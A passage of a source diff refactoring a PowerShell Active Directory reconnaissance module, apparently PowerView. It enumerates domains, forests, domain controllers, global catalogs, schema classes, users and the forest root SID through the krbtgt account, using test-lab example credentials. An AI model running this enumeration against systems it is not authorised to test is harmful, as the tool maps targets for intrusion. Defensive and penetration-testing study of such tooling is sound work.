- [Parameter(ValueFromPipeline=$True)]
+ [OutputType([System.DirectoryServices.ActiveDirectory.Domain])]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True)]
+ [ValidateNotNullOrEmpty()]
[String]
$Domain,
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- if($Credential) {
-
- Write-Verbose "Using alternate credentials for Get-NetDomain"
+ PROCESS {
+ if ($PSBoundParameters['Credential']) {
+
+ Write-Verbose '[Get-Domain] Using alternate credentials for Get-Domain'
+
+ if ($PSBoundParameters['Domain']) {
+ $TargetDomain = $Domain
+ }
+ else {
+ # if no domain is supplied, extract the logon domain from the PSCredential passed
+ $TargetDomain = $Credential.GetNetworkCredential().Domain
+ Write-Verbose "[Get-Domain] Extracted domain '$TargetDomain' from -Credential"
+ }
+
+ $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $TargetDomain, $Credential.UserName, $Credential.GetNetworkCredential().Password)
- if(!$Domain) {
- # if no domain is supplied, extract the logon domain from the PSCredential passed
- $Domain = $Credential.GetNetworkCredential().Domain
- Write-Verbose "Extracted domain '$Domain' from -Credential"
+ try {
+ [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)
+ }
+ catch {
+ Write-Verbose "[Get-Domain] The specified domain '$TargetDomain' does not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid: $_"
+ }
}
-
- $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $Domain, $Credential.UserName, $Credential.GetNetworkCredential().Password)
-
- try {
- [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)
+ elseif ($PSBoundParameters['Domain']) {
+ $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $Domain)
+ try {
+ [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)
+ }
+ catch {
+ Write-Verbose "[Get-Domain] The specified domain '$Domain' does not exist, could not be contacted, or there isn't an existing trust : $_"
+ }
}
- catch {
- Write-Verbose "The specified domain does '$Domain' not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid."
- $Null
+ else {
+ try {
+ [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
+ }
+ catch {
+ Write-Verbose "[Get-Domain] Error retrieving the current domain: $_"
+ }
}
}
- elseif($Domain) {
- $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $Domain)
- try {
- [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)
+}
+
+
+function Get-DomainController {
+<#
+.SYNOPSIS
+
+Return the domain controllers for the current (or specified) domain.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Get-Domain
+
+.DESCRIPTION
+
+Enumerates the domain controllers for the current or specified domain.
+By default built in .NET methods are used. The -LDAP switch uses Get-DomainComputer
+to search for domain controllers.
+
+.PARAMETER Domain
+
+The domain to query for domain controllers, defaults to the current domain.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER LDAP
+
+Switch. Use LDAP queries to determine the domain controllers instead of built in .NET methods.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Get-DomainController -Domain 'test.local'
+
+Determine the domain controllers for 'test.local'.
+
+.EXAMPLE
+
+Get-DomainController -Domain 'test.local' -LDAP
+
+Determine the domain controllers for 'test.local' using LDAP queries.
+
+.EXAMPLE
+
+'test.local' | Get-DomainController
+
+Determine the domain controllers for 'test.local'.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainController -Credential $Cred
+
+.OUTPUTS
+
+PowerView.Computer
+
+Outputs custom PSObjects with details about the enumerated domain controller if -LDAP is specified.
+
+System.DirectoryServices.ActiveDirectory.DomainController
+
+If -LDAP isn't specified.
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.Computer')]
+ [OutputType('System.DirectoryServices.ActiveDirectory.DomainController')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True)]
+ [String]
+ $Domain,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [Switch]
+ $LDAP,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ PROCESS {
+ $Arguments = @{}
+ if ($PSBoundParameters['Domain']) { $Arguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential }
+
+ if ($PSBoundParameters['LDAP'] -or $PSBoundParameters['Server']) {
+ if ($PSBoundParameters['Server']) { $Arguments['Server'] = $Server }
+
+ # UAC specification for domain controllers
+ $Arguments['LDAPFilter'] = '(userAccountControl:1.2.840.113556.1.4.803:=8192)'
+
+ Get-DomainComputer @Arguments
}
- catch {
- Write-Verbose "The specified domain '$Domain' does not exist, could not be contacted, or there isn't an existing trust."
- $Null
+ else {
+ $FoundDomain = Get-Domain @Arguments
+ if ($FoundDomain) {
+ $FoundDomain.DomainControllers
+ }
}
}
- else {
- [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
- }
}
-filter Get-NetForest {
+function Get-Forest {
<#
- .SYNOPSIS
+.SYNOPSIS
- Returns a given forest object.
+Returns the forest object for the current (or specified) forest.
- .PARAMETER Forest
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: ConvertTo-SID
- The forest name to query for, defaults to the current domain.
+.DESCRIPTION
- .PARAMETER Credential
+Returns a System.DirectoryServices.ActiveDirectory.Forest object for the current
+forest or the forest specified with -Forest X.
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+.PARAMETER Forest
- .EXAMPLE
-
- PS C:\> Get-NetForest -Forest external.domain
+The forest name to query for, defaults to the current forest.
- .EXAMPLE
-
- PS C:\> "external.domain" | Get-NetForest
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target forest.
+
+.EXAMPLE
+
+Get-Forest -Forest external.domain
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-Forest -Credential $Cred
+
+.OUTPUTS
+
+System.Management.Automation.PSCustomObject
+
+Outputs a PSObject containing System.DirectoryServices.ActiveDirectory.Forest in addition
+to the forest root domain SID.
#>
- param(
- [Parameter(ValueFromPipeline=$True)]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('System.Management.Automation.PSCustomObject')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True)]
+ [ValidateNotNullOrEmpty()]
[String]
$Forest,
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- if($Credential) {
-
- Write-Verbose "Using alternate credentials for Get-NetForest"
+ PROCESS {
+ if ($PSBoundParameters['Credential']) {
- if(!$Forest) {
- # if no domain is supplied, extract the logon domain from the PSCredential passed
- $Forest = $Credential.GetNetworkCredential().Domain
- Write-Verbose "Extracted domain '$Forest' from -Credential"
- }
-
- $ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $Forest, $Credential.UserName, $Credential.GetNetworkCredential().Password)
-
- try {
- $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext)
+ Write-Verbose "[Get-Forest] Using alternate credentials for Get-Forest"
+
+ if ($PSBoundParameters['Forest']) {
+ $TargetForest = $Forest
+ }
+ else {
+ # if no domain is supplied, extract the logon domain from the PSCredential passed
+ $TargetForest = $Credential.GetNetworkCredential().Domain
+ Write-Verbose "[Get-Forest] Extracted domain '$Forest' from -Credential"
+ }
+
+ $ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $TargetForest, $Credential.UserName, $Credential.GetNetworkCredential().Password)
+
+ try {
+ $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext)
+ }
+ catch {
+ Write-Verbose "[Get-Forest] The specified forest '$TargetForest' does not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid: $_"
+ $Null
+ }
}
- catch {
- Write-Verbose "The specified forest '$Forest' does not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid."
- $Null
+ elseif ($PSBoundParameters['Forest']) {
+ $ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $Forest)
+ try {
+ $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext)
+ }
+ catch {
+ Write-Verbose "[Get-Forest] The specified forest '$Forest' does not exist, could not be contacted, or there isn't an existing trust: $_"
+ return $Null
+ }
}
- }
- elseif($Forest) {
- $ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $Forest)
- try {
- $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext)
+ else {
+ # otherwise use the current forest
+ $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
}
- catch {
- Write-Verbose "The specified forest '$Forest' does not exist, could not be contacted, or there isn't an existing trust."
- return $Null
+
+ if ($ForestObject) {
+ # get the SID of the forest root
+ if ($PSBoundParameters['Credential']) {
+ $ForestSid = (Get-DomainUser -Identity "krbtgt" -Domain $ForestObject.RootDomain.Name -Credential $Credential).objectsid
+ }
+ else {
+ $ForestSid = (Get-DomainUser -Identity "krbtgt" -Domain $ForestObject.RootDomain.Name).objectsid
+ }
+
+ $Parts = $ForestSid -Split '-'
+ $ForestSid = $Parts[0..$($Parts.length-2)] -join '-'
+ $ForestObject | Add-Member NoteProperty 'RootDomainSid' $ForestSid
+ $ForestObject
}
}
- else {
- # otherwise use the current forest
- $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
- }
+}
+
+
+function Get-ForestDomain {
+<#
+.SYNOPSIS
+
+Return all domains for the current (or specified) forest.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-Forest
+
+.DESCRIPTION
+
+Returns all domains for the current forest or the forest specified
+by -Forest X.
+
+.PARAMETER Forest
+
+Specifies the forest name to query for domains.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target forest.
+
+.EXAMPLE
+
+Get-ForestDomain
- if($ForestObject) {
- # get the SID of the forest root
- $ForestSid = (New-Object System.Security.Principal.NTAccount($ForestObject.RootDomain,"krbtgt")).Translate([System.Security.Principal.SecurityIdentifier]).Value
- $Parts = $ForestSid -Split "-"
- $ForestSid = $Parts[0..$($Parts.length-2)] -join "-"
- $ForestObject | Add-Member NoteProperty 'RootDomainSid' $ForestSid
- $ForestObject
+.EXAMPLE
+
+Get-ForestDomain -Forest external.local
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-ForestDomain -Credential $Cred
+
+.OUTPUTS
+
+System.DirectoryServices.ActiveDirectory.Domain
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('System.DirectoryServices.ActiveDirectory.Domain')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True)]
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Forest,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ PROCESS {
+ $Arguments = @{}
+ if ($PSBoundParameters['Forest']) { $Arguments['Forest'] = $Forest }
+ if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential }
+
+ $ForestObject = Get-Forest @Arguments
+ if ($ForestObject) {
+ $ForestObject.Domains
+ }
}
}
-filter Get-NetForestDomain {
+function Get-ForestGlobalCatalog {
<#
- .SYNOPSIS
+.SYNOPSIS
- Return all domains for a given forest.
+Return all global catalogs for the current (or specified) forest.
- .PARAMETER Forest
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-Forest
- The forest name to query domain for.
+.DESCRIPTION
- .PARAMETER Credential
+Returns all global catalogs for the current forest or the forest specified
+by -Forest X by using Get-Forest to retrieve the specified forest object
+and the .FindAllGlobalCatalogs() to enumerate the global catalogs.
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+.PARAMETER Forest
- .EXAMPLE
+Specifies the forest name to query for global catalogs.
- PS C:\> Get-NetForestDomain
+.PARAMETER Credential
- .EXAMPLE
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- PS C:\> Get-NetForestDomain -Forest external.local
+.EXAMPLE
+
+Get-ForestGlobalCatalog
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-ForestGlobalCatalog -Credential $Cred
+
+.OUTPUTS
+
+System.DirectoryServices.ActiveDirectory.GlobalCatalog
#>
- param(
- [Parameter(ValueFromPipeline=$True)]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('System.DirectoryServices.ActiveDirectory.GlobalCatalog')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True)]
+ [ValidateNotNullOrEmpty()]
[String]
$Forest,
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- $ForestObject = Get-NetForest -Forest $Forest -Credential $Credential
+ PROCESS {
+ $Arguments = @{}
+ if ($PSBoundParameters['Forest']) { $Arguments['Forest'] = $Forest }
+ if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential }
- if($ForestObject) {
- $ForestObject.Domains
+ $ForestObject = Get-Forest @Arguments
+
+ if ($ForestObject) {
+ $ForestObject.FindAllGlobalCatalogs()
+ }
}
}
-filter Get-NetForestCatalog {
+function Get-ForestSchemaClass {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Helper that returns the Active Directory schema classes for the current
+(or specified) forest or returns just the schema class specified by
+-ClassName X.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-Forest
+
+.DESCRIPTION
+
+Uses Get-Forest to retrieve the current (or specified) forest. By default,
+the .FindAllClasses() method is executed, returning a collection of
+[DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass] results.
+If "-FindClass X" is specified, the [DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass]
+result for the specified class name is returned.
+
+.PARAMETER ClassName
+
+Specifies a ActiveDirectorySchemaClass name in the found schema to return.
+
+.PARAMETER Forest
+
+The forest to query for the schema, defaults to the current forest.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Get-ForestSchemaClass
+
+Returns all domain schema classes for the current forest.
+
+.EXAMPLE
+
+Get-ForestSchemaClass -Forest dev.testlab.local
+
+Returns all domain schema classes for the external.local forest.
+
+.EXAMPLE
+
+Get-ForestSchemaClass -ClassName user -Forest external.local
- Return all global catalogs for a given forest.
+Returns the user schema class for the external.local domain.
- .PARAMETER Forest
+.EXAMPLE
- The forest name to query domain for.
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-ForestSchemaClass -ClassName user -Forest external.local -Credential $Cred
- .PARAMETER Credential
+Returns the user schema class for the external.local domain using
+the specified alternate credentials.
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+.OUTPUTS
- .EXAMPLE
+[DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass]
- PS C:\> Get-NetForestCatalog
+An ActiveDirectorySchemaClass returned from the found schema.
#>
-
- param(
- [Parameter(ValueFromPipeline=$True)]
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType([System.DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass])]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True)]
+ [Alias('Class')]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $ClassName,
+
+ [Alias('Name')]
+ [ValidateNotNullOrEmpty()]
[String]
$Forest,
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- $ForestObject = Get-NetForest -Forest $Forest -Credential $Credential
+ PROCESS {
+ $Arguments = @{}
+ if ($PSBoundParameters['Forest']) { $Arguments['Forest'] = $Forest }
+ if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential }
+
+ $ForestObject = Get-Forest @Arguments
- if($ForestObject) {
- $ForestObject.FindAllGlobalCatalogs()
+ if ($ForestObject) {
+ if ($PSBoundParameters['ClassName']) {
+ ForEach ($TargetClass in $ClassName) {
+ $ForestObject.Schema.FindClass($TargetClass)
+ }
+ }
+ else {
+ $ForestObject.Schema.FindAllClasses()
+ }
+ }
}
}
-filter Get-NetDomainController {
+function Find-DomainObjectPropertyOutlier {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Finds user/group/computer objects in AD that have 'outlier' properties set.
+
+Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: Get-Domain, Get-DomainUser, Get-DomainGroup, Get-DomainComputer
+
+.DESCRIPTION
+
+A 'reference' set of property names is calculated, either from a standard set preserved
+for user/group/computers, or from the array of names passed to -ReferencePropertySet, or
+from the property names of the passed -ReferenceObject. Every user/group/computer object
+(depending on determined class) are enumerated, and for each object, if the object has a
+'non-standard' property set (meaning a property not held by the reference set), the object's
+samAccountName, property name, and property value are output to the pipeline.
+
+.PARAMETER ClassName
+
+Specifies the AD object class to find property outliers for, 'user', 'group', or 'computer'.
+If -ReferenceObject is specified, this will be automatically extracted, if possible.
+
+.PARAMETER ReferencePropertySet
+
+Specifies an array of property names to diff against the class schema.
- Return the current domain controllers for the active domain.
+.PARAMETER ReferenceObject
- .PARAMETER Domain
+Specicifes the PowerView user/group/computer object to extract property names
+from to use as the reference set.
- The domain to query for domain controllers, defaults to the current domain.
+.PARAMETER Domain
- .PARAMETER DomainController
+Specifies the domain to use for the query, defaults to the current domain.
- Domain controller to reflect LDAP queries through.
+.PARAMETER LDAPFilter
- .PARAMETER LDAP
+Specifies an LDAP query string that is used to filter Active Directory objects.
- Switch. Use LDAP queries to determine the domain controllers.
+.PARAMETER SearchBase
- .PARAMETER Credential
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+.PARAMETER Server
- .EXAMPLE
+Specifies an Active Directory server (domain controller) to bind to.
- PS C:\> Get-NetDomainController -Domain 'test.local'
-
- Determine the domain controllers for 'test.local'.
+.PARAMETER SearchScope
- .EXAMPLE
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
- PS C:\> Get-NetDomainController -Domain 'test.local' -LDAP
+.PARAMETER ResultPageSize
- Determine the domain controllers for 'test.local' using LDAP queries.
+Specifies the PageSize to set for the LDAP searcher object.
- .EXAMPLE
+.PARAMETER ServerTimeLimit
- PS C:\> 'test.local' | Get-NetDomainController
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- Determine the domain controllers for 'test.local'.
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Find-DomainObjectPropertyOutlier -ClassName 'User'
+
+Enumerates users in the current domain with 'outlier' properties filled in.
+
+.EXAMPLE
+
+Find-DomainObjectPropertyOutlier -ClassName 'Group' -Domain external.local
+
+Enumerates groups in the external.local forest/domain with 'outlier' properties filled in.
+
+.EXAMPLE
+
+Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier
+
+Enumerates computers in the current domain with 'outlier' properties filled in.
+
+.OUTPUTS
+
+PowerView.PropertyOutlier
+
+Custom PSObject with translated object property outliers.
#>
- [CmdletBinding()]
- param(
- [Parameter(ValueFromPipeline=$True)]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.PropertyOutlier')]
+ [CmdletBinding(DefaultParameterSetName = 'ClassName')]
+ Param(
+ [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'ClassName')]
+ [Alias('Class')]
+ [ValidateSet('User', 'Group', 'Computer')]
+ [String]
+ $ClassName,
+
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $ReferencePropertySet,
+
+ [Parameter(ValueFromPipeline = $True, Mandatory = $True, ParameterSetName = 'ReferenceObject')]
+ [PSCustomObject]
+ $ReferenceObject,
+
+ [ValidateNotNullOrEmpty()]
[String]
$Domain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
+ [String]
+ $LDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
+ [String]
+ $SearchBase,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
- $DomainController,
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
[Switch]
- $LDAP,
+ $Tombstone,
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- if($LDAP -or $DomainController) {
- # filter string to return all domain controllers
- Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -FullData -Filter '(userAccountControl:1.2.840.113556.1.4.803:=8192)'
+ BEGIN {
+ $UserReferencePropertySet = @('admincount','accountexpires','badpasswordtime','badpwdcount','cn','codepage','countrycode','description', 'displayname','distinguishedname','dscorepropagationdata','givenname','instancetype','iscriticalsystemobject','lastlogoff','lastlogon','lastlogontimestamp','lockouttime','logoncount','memberof','msds-supportedencryptiontypes','name','objectcategory','objectclass','objectguid','objectsid','primarygroupid','pwdlastset','samaccountname','samaccounttype','sn','useraccountcontrol','userprincipalname','usnchanged','usncreated','whenchanged','whencreated')
+
+ $GroupReferencePropertySet = @('admincount','cn','description','distinguishedname','dscorepropagationdata','grouptype','instancetype','iscriticalsystemobject','member','memberof','name','objectcategory','objectclass','objectguid','objectsid','samaccountname','samaccounttype','systemflags','usnchanged','usncreated','whenchanged','whencreated')
+
+ $ComputerReferencePropertySet = @('accountexpires','badpasswordtime','badpwdcount','cn','codepage','countrycode','distinguishedname','dnshostname','dscorepropagationdata','instancetype','iscriticalsystemobject','lastlogoff','lastlogon','lastlogontimestamp','localpolicyflags','logoncount','msds-supportedencryptiontypes','name','objectcategory','objectclass','objectguid','objectsid','operatingsystem','operatingsystemservicepack','operatingsystemversion','primarygroupid','pwdlastset','samaccountname','samaccounttype','serviceprincipalname','useraccountcontrol','usnchanged','usncreated','whenchanged','whencreated')
+
+ $SearcherArguments = @{}
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+
+ # Domain / Credential
+ if ($PSBoundParameters['Domain']) {
+ if ($PSBoundParameters['Credential']) {
+ $TargetForest = Get-Domain -Domain $Domain | Select-Object -ExpandProperty Forest | Select-Object -ExpandProperty Name
+ }
+ else {
+ $TargetForest = Get-Domain -Domain $Domain -Credential $Credential | Select-Object -ExpandProperty Forest | Select-Object -ExpandProperty Name
+ }
+ Write-Verbose "[Find-DomainObjectPropertyOutlier] Enumerated forest '$TargetForest' for target domain '$Domain'"
+ }
+
+ $SchemaArguments = @{}
+ if ($PSBoundParameters['Credential']) { $SchemaArguments['Credential'] = $Credential }
+ if ($TargetForest) {
+ $SchemaArguments['Forest'] = $TargetForest
+ }
}
- else {
- $FoundDomain = Get-NetDomain -Domain $Domain -Credential $Credential
- if($FoundDomain) {
- $Founddomain.DomainControllers
+
+ PROCESS {
+
+ if ($PSBoundParameters['ReferencePropertySet']) {
+ Write-Verbose "[Find-DomainObjectPropertyOutlier] Using specified -ReferencePropertySet"
+ $ReferenceObjectProperties = $ReferencePropertySet
+ }
+ elseif ($PSBoundParameters['ReferenceObject']) {
+ Write-Verbose "[Find-DomainObjectPropertyOutlier] Extracting property names from -ReferenceObject to use as the reference property set"
+ $ReferenceObjectProperties = Get-Member -InputObject $ReferenceObject -MemberType NoteProperty | Select-Object -Expand Name
+ $ReferenceObjectClass = $ReferenceObject.objectclass | Select-Object -Last 1
+ Write-Verbose "[Find-DomainObjectPropertyOutlier] Calculated ReferenceObjectClass : $ReferenceObjectClass"
+ }
+ else {
+ Write-Verbose "[Find-DomainObjectPropertyOutlier] Using the default reference property set for the object class '$ClassName'"
+ }
+
+ if (($ClassName -eq 'User') -or ($ReferenceObjectClass -eq 'User')) {
+ $Objects = Get-DomainUser @SearcherArguments
+ if (-not $ReferenceObjectProperties) {
+ $ReferenceObjectProperties = $UserReferencePropertySet
+ }
+ }
+ elseif (($ClassName -eq 'Group') -or ($ReferenceObjectClass -eq 'Group')) {
+ $Objects = Get-DomainGroup @SearcherArguments
+ if (-not $ReferenceObjectProperties) {
+ $ReferenceObjectProperties = $GroupReferencePropertySet
+ }
+ }
+ elseif (($ClassName -eq 'Computer') -or ($ReferenceObjectClass -eq 'Computer')) {
+ $Objects = Get-DomainComputer @SearcherArguments
+ if (-not $ReferenceObjectProperties) {
+ $ReferenceObjectProperties = $ComputerReferencePropertySet
+ }
+ }
+ else {
+ throw "[Find-DomainObjectPropertyOutlier] Invalid class: $ClassName"
+ }
+
+ ForEach ($Object in $Objects) {
+ $ObjectProperties = Get-Member -InputObject $Object -MemberType NoteProperty | Select-Object -Expand Name
+ ForEach($ObjectProperty in $ObjectProperties) {
+ if ($ReferenceObjectProperties -NotContains $ObjectProperty) {
+ $Out = New-Object PSObject
+ $Out | Add-Member Noteproperty 'SamAccountName' $Object.SamAccountName
+ $Out | Add-Member Noteproperty 'Property' $ObjectProperty
+ $Out | Add-Member Noteproperty 'Value' $Object.$ObjectProperty
+ $Out.PSObject.TypeNames.Insert(0, 'PowerView.PropertyOutlier')
+ $Out
+ }
+ }
}
}
}
@@ -2472,86 +4833,200 @@ filter Get-NetDomainController {
#
########################################################
-function Get-NetUser {
+function Get-DomainUser {
<#
- .SYNOPSIS
+.SYNOPSIS
- Query information for a given user or users in the domain
- using ADSI and LDAP. Another -Domain can be specified to
- query for users across a trust.
- Replacement for "net users /domain"
+Return all users or specific user objects in AD.
- .PARAMETER UserName
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-ADName, Convert-LDAPProperty
- Username filter string, wildcards accepted.
+.DESCRIPTION
- .PARAMETER Domain
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria. To only return specific properties, use
+"-Properties samaccountname,usnchanged,...". By default, all user objects for
+the current domain are returned.
- The domain to query for users, defaults to the current domain.
+.PARAMETER Identity
- .PARAMETER DomainController
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted. Also accepts DOMAIN\user format.
- Domain controller to reflect LDAP queries through.
+.PARAMETER SPN
- .PARAMETER ADSpath
+Switch. Only return user objects with non-null service principal names.
- The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
- Useful for OU queries.
+.PARAMETER UACFilter
- .PARAMETER Filter
+Dynamic parameter that accepts one or more values from $UACEnum, including
+"NOT_X" negation forms. To see all possible values, run '0|ConvertFrom-UACValue -ShowAll'.
- A customized ldap filter string to use, e.g. "(description=*admin*)"
